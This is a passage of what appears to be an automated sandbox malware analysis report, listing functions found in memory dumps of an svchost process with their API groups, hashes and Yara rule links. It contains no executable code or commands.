                                                                                                                                        • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                        • Instruction Fuzzy Hash: D2B10A31528F988BD76D9A288CA66F9F7D2FBC9301F10056DD4D7C7183ED20DE428681
                                                                                                                                        Function 00007DF416F8A0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2835849967-0
                                                                                                                                        • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                        • Instruction ID: 73243964ee9995853e26cb08d3c8d415f5f8bb635cc5a67feadcd51c1d9f46d0
                                                                                                                                        • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                        • Instruction Fuzzy Hash: CCD14B7161CB888BD765EF28D4856ABB7E4FB94310F10462EE48EC2191EF34E545CB92
                                                                                                                                        Function 00007DF416FA128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateReadmalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3950102678-0
                                                                                                                                        • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                        • Instruction ID: a233f8c87167a0883cb4d86fe474e2aeb3aaab100dd8bdca4477566c52cb7926
                                                                                                                                        • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                        • Instruction Fuzzy Hash: 7971847060CF884FE758DF5894C53AAB6E1FB98351F61093EE48FC3292EA38D845C652
                                                                                                                                        Function 00007DF416F89F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3388366904-0
                                                                                                                                        • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                        • Instruction ID: 4e2709fb64a3849295624254f230c2bac74c205ec84dde63c77a70de9f5d37cc
                                                                                                                                        • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                        • Instruction Fuzzy Hash: D241E53070CA484FEB58EB289C8566B73E5FBD8710F10056EE88FC3191EE34D9058792
                                                                                                                                        Function 00007DF416FC8194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3755109111-0
                                                                                                                                        • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                        • Instruction ID: 710b6e58a31d8ea9bb8bb7bf38e239be1ac86f846f39511cfe9faaec9577283d
                                                                                                                                        • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                        • Instruction Fuzzy Hash: 8641A830618E484FE7589B28D89CABB7BE5FB45321F61053BE45BC2191EB38D901C656
                                                                                                                                        Function 00007DF416FC9488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3755109111-0
                                                                                                                                        • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                        • Instruction ID: a3b10c8e6d1e2e3b401f6b39140a83efbdc2da28184d903dc322472794050dd2
                                                                                                                                        • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                        • Instruction Fuzzy Hash: D9319230B18D584FFB989B2C9885A3A33E4FB55326F60547AD80FC2196FA29DC41C6A5
                                                                                                                                        Function 00007DF416FA0E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3388366904-0
                                                                                                                                        • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                        • Instruction ID: 3c5fdbc36bcde8dd7b92d02bca44ecdbb7de52529839136a715c639f3aec5359
                                                                                                                                        • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                        • Instruction Fuzzy Hash: 7221C97170CB484BE3549A58A8C667A73D4EB99724F10413EE98FC3242EA74A806C696
                                                                                                                                        Function 00007DF416F9A38C Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initializefree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1505762977-0
                                                                                                                                        • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                        • Instruction ID: f15af28d64648d4e09471d599a6d3e048809a4f6208a521e1c83bf899146df5b
                                                                                                                                        • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                        • Instruction Fuzzy Hash: DC218330608A4C8FDF94EF28D845A9A77E1FF94325F00462AB84ED3151DB35E841CB91
                                                                                                                                        Function 00007DF416F8D818 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$AcceptConnectNameName_Portcallocfreemalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2547275272-0
                                                                                                                                        • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                        • Instruction ID: 2ddbffcd5dc8246856f9e96e25125f8e4c6061372a9d01d0152aa4e2a60b4a3a
                                                                                                                                        • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                        • Instruction Fuzzy Hash: 7301F731218E0C4FE748AB5CA8895B677D5E799762714417AE40AC3261ED35D8418BD1
                                                                                                                                        Function 00000155E73E30C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.2840753240.00000155E73E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E73E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_155e73e0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                        • Instruction ID: a1b8f883902b4842671236584343e1a0129669a7619e2a9b0d98f633dbad7893
                                                                                                                                        • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                        • Instruction Fuzzy Hash: 22C15430618F498FDB98EF18D895BA9F7E1FBD8311F00452DE48AC7256DB34E9858B81
                                                                                                                                        Function 00007DF416F86984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Timer$CreateQueue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3971536239-0
                                                                                                                                        • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                        • Instruction ID: 82d2b65c3091a60780e7ef79c16514a0e9a7d81a179f9e4d809e5ae9d97f3893
                                                                                                                                        • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                        • Instruction Fuzzy Hash: 9CB19531A1CE4C8BE765EB2898496A7B3E1FB95321F60466BD44FC31A1EF38E541C781
                                                                                                                                        Function 00007DF416F89BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFileMapping
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 524692379-0
                                                                                                                                        • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                        • Instruction ID: bc08fc6c19b3d616071f2e507352d3acb9ab35b423f519c6a0fd05eecb2f6343
                                                                                                                                        • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                        • Instruction Fuzzy Hash: AEB15F3160CE8C8FE755EF28D4846AAB7E1FB94310F204A6EE04FC7192EA34E545CB91
                                                                                                                                        Function 00007DF417055CC4 Relevance: 1.8, APIs: 1, Instructions: 535COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2635317215-0
                                                                                                                                        • Opcode ID: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                                        • Instruction ID: 3d977e7db7c5ae0e6c240053fa0efb282fab5fd54d91755741fde290615a31de
                                                                                                                                        • Opcode Fuzzy Hash: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                                        • Instruction Fuzzy Hash: 6112623151CF888BEBA4EB18A884BA777F5FFA5300F24457AD84EC7185EA34E905C761
                                                                                                                                        Function 00007DF416FC9A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                        • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                        • Instruction ID: e9001aee3df3d46fcfc9b3e5414ff3f595501cab5aa459da73080c4deaa277c5
                                                                                                                                        • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                        • Instruction Fuzzy Hash: 33911F70618E498FEB94DF2CC489AA677F0FF55325F60016AD84FC65A1EB39E840CB61
                                                                                                                                        Function 00007DF416F72514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                        • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                        • Instruction ID: 91ea5574339700ef9fd814c6e10b9ad3a6126bf492e1ffb80dabaf980085beb7
                                                                                                                                        • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                        • Instruction Fuzzy Hash: 7D51E83461CE4D4FEB55AA6CA45876672E1FB98320F20413BE44EC3195EE68E981C791
                                                                                                                                        Function 00007DF416F85870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationVolume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2039140958-0
                                                                                                                                        • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                        • Instruction ID: 69a588dc5a7ef677f65f181318ea1ece1e629391b4f2fc799db025fdcd07bbee
                                                                                                                                        • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                        • Instruction Fuzzy Hash: F9613A7160CA8C8BD765EF64D8946EBB7E1FB94310F104A2EE08FC2155EE34E645CB52
                                                                                                                                        Function 00007DF416FA0BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                        • Instruction ID: 4935017806f4abf9e77f976257e3a2d02f865e365fcb443d44a4cb3289942b7b
                                                                                                                                        • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                        • Instruction Fuzzy Hash: 6B51203161CB888FE764DB18D85576BB7E5FF98314F10052EE48EC3191EA74E901CB52
                                                                                                                                        Function 00007DF416F884B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF416F837B8), ref: 00007DF416F885F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3978063606-0
                                                                                                                                        • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                        • Instruction ID: 717b03650ca4ec3989e80ea24c626a399fd89d8b539c915a126d701d044a267e
                                                                                                                                        • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                        • Instruction Fuzzy Hash: E241C430B08E8C4FDB54EB28988516A73A5FF48720B244566E41FCB281EE28E805C791
                                                                                                                                        Function 00007DF416F836BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                        • Instruction ID: 0dcecf30c643a310706365b4629b41a84b3bfafbebbd677b63c6e06736cd9072
                                                                                                                                        • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                        • Instruction Fuzzy Hash: 7C318922B5CD8D5BEB54B798D88256E72F6EF54320B60047AD00FC31F2F918EC45C6A2
                                                                                                                                        Function 00000155E72D1870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000002.3234182550.00000155E72D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E72D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_2_155e72d0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                        • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                        • Instruction ID: b6a3a9a6d17c68f8fdd597d13c3d149e0bbd5b32a5c98bd3e6cdaffc38de1c67
                                                                                                                                        • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                        • Instruction Fuzzy Hash: 8731C370120E47CAFBA597A88CA67F1F2D3EBC4312F1601A9C215DB8D2EB35CB49D640
                                                                                                                                        Function 00007DF416FC9878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                        • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                        • Instruction ID: 852ded070220627953a7535db578d0e6d085f22ca2b2335c103177ae8806cbda
                                                                                                                                        • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                        • Instruction Fuzzy Hash: 3821AB3070CD084FEB58DB789889A6673E1FB55335F20467AD82FC72D5EA28DC01C661
                                                                                                                                        Function 00007DF416F86748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: getaddrinfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 300660673-0
                                                                                                                                        • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                        • Instruction ID: 7b6b64e4ffe5cfa859c7305bcf0f80d007dda4f46507345d5c8f8e326ee0a07b
                                                                                                                                        • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                        • Instruction Fuzzy Hash: 09317F70608A488FEB54DF24C898B5A73E5FF98714F1002B9D84EDB295DB39E802CB51
                                                                                                                                        Function 00007DF416FC8420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                        • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                        • Instruction ID: 987204291c1693d013bf5bad67200648b145f51b348a666cb02e7f59394d553c
                                                                                                                                        • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                        • Instruction Fuzzy Hash: 39118730718D4D4FE6589B6C9884B6676E5FB49335F71063AE42FC22D2EB28EC06C250
                                                                                                                                        Function 00007DF416F9789C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: realloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 471065373-0
                                                                                                                                        • Opcode ID: 2843f39e203b58c8d64a8fb9a29ded769314d553df57ef20e130d220699cc53a
                                                                                                                                        • Instruction ID: f9b930e3e9fb6876ea3ed3c0a5f9d4cdf776210f951771b1667e2962ab7e8a84
                                                                                                                                        • Opcode Fuzzy Hash: 2843f39e203b58c8d64a8fb9a29ded769314d553df57ef20e130d220699cc53a
                                                                                                                                        • Instruction Fuzzy Hash: 0A11A130A18E1E8FEB5CEF188849731B7E1FB58325B2405A6E419CB695E728D9C0C7E1
                                                                                                                                        Function 00007DF416F72B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                        • Instruction ID: c3a6e842193e08b6d8d1f2eed1e895ab75403eabd33ca6a4c69df3afdac12e69
                                                                                                                                        • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                        • Instruction Fuzzy Hash: BC01A230A14D0D8FDB54AB6DDC8862673E6FB88321B548075E80AC7144EA76F891CBA0
                                                                                                                                        Function 00007DF416FC8374 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                        • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                        • Instruction ID: 1d92b7fff477e866f65f03f8c7dcad70af0821bce053d4bf5d31c45a2f4d560d
                                                                                                                                        • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                        • Instruction Fuzzy Hash: BB014F70914A488FEB84DF18C4C9B213BE4EF55339F5521A6DC1ACA196E375DC90C780
                                                                                                                                        Function 00007DF416F72D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
